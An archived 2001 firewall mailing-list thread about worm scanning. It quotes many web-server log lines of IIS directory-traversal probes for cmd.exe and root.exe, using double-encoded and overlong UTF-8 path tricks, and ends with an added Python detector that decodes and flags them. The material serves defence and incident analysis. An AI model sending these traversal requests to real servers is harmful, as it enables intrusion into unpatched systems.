Don't know if this is related, maybe. The company which hosts our site has
a file readme.eml which got stuck on its box. If you hit our URL, it asks
if you would like to save or open a file readme.exe. I have a copy of the
readme.exe currently if anyone would like to break it down. One of my users
ran it, and we now have *.eml files and riched20.dll files all over our network.
Possibly related to a vulnerability discussed here:
http://groups.google.com/groups?q=riched20.dll&hl=en&group=comp.risks&rnum=1&selm=CMM.0.90.1.944088342.risko%40chiron.csl.sri.com
----- Original Message -----
From: "Ron DuFresne" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:50 AM
Subject: something new afoot, sweeping scans:
>
> Folks,
>
> Someone mentioned seeing similar signatures in their logs earlier today
> to the signatures we are seeing in dramatic rapidity in a short time span.
> Are other sites seeing similar signatures? <quick greps attached and
> posted below> Has a new toy been unleashed, or is this an old toy we have
> not seen the signature for before?
>
> 208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:44 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:49:46 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:48 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:49:50 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:51 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
>
>
>
> Thanks,
>
>
> Ron DuFresne
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> "Cutting the space budget really restores my faith in humanity. It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation." -- Johnny Hart
> ***testing, only testing, and damn good at it too!***
>
> OK, so you're a Ph.D. Just don't touch anything.
>
_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
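As an added example (not part of either message above), a small Python detector for the scan pattern in the quoted greps: it reduces each request target to the path a lenient decoder would act on, so the double-encoded (%255c, %25%35%63, %%35%63) and overlong-UTF-8 (%c0%af, %c1%9c) variants all collapse to the same traversal, then reports every hit and ranks the source addresses. The sample log lines are constructed from the ones quoted above; the separator-alias table (which byte pairs map to '/' and '\') is an assumption drawn from the sequences in that log, not from any server's documentation.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the same Apache log format as the greps quoted above.
SAMPLE_LOG = """\
208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
10.0.0.5 - - [18/Sep/2001:10:02:00 -0400] "GET /scripts/page.html HTTP/1.0" 200 1043
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Overlong or malformed UTF-8 pairs from the scan; the lenient decoder on the
# scanned hosts took them as path separators (mapping assumed from the log).
SEPARATOR_ALIASES = {"%c0%af": "/", "%c0%2f": "/", "%c1%1c": "\\", "%c1%9c": "\\"}
SUSPECT_BINARIES = ("cmd.exe", "root.exe")

def canonicalise(target: str) -> str:
    """Reduce the target to the path a lenient decoder acts on: drop the query,
    lower-case, map the overlong separators, then percent-decode twice so that
    %255c, %25%35%63 and %%35%63 all collapse to a single backslash."""
    path = target.split("?", 1)[0].lower()
    for alias, sep in SEPARATOR_ALIASES.items():
        path = path.replace(alias, sep)
    return unquote(unquote(path)).replace("\\", "/")

def classify(target: str):
    """'traversal', 'direct' or None for one request target."""
    path = canonicalise(target)
    if path.rsplit("/", 1)[-1] not in SUSPECT_BINARIES:
        return None
    return "traversal" if "/../" in path else "direct"

def scan(log_text: str):
    """(ip, timestamp, status, kind, raw target) for every probe, whatever the
    server answered: a 404 or 400 still identifies the scanning host."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (kind := classify(m["target"])):
            hits.append((m["ip"], m["ts"], m["status"], kind, m["target"]))
    return hits

def hosts_by_probe_count(log_text: str) -> Counter:
    """Source addresses ranked by probe count, the view a firewall admin wants."""
    return Counter(hit[0] for hit in scan(log_text))
```

Feed it a real access log with `scan(open(path).read())`; the point of canonicalising first is that a plain grep for `cmd.exe` misses nothing here, but a grep for `..%5c` or `../` would miss most of the encoded variants.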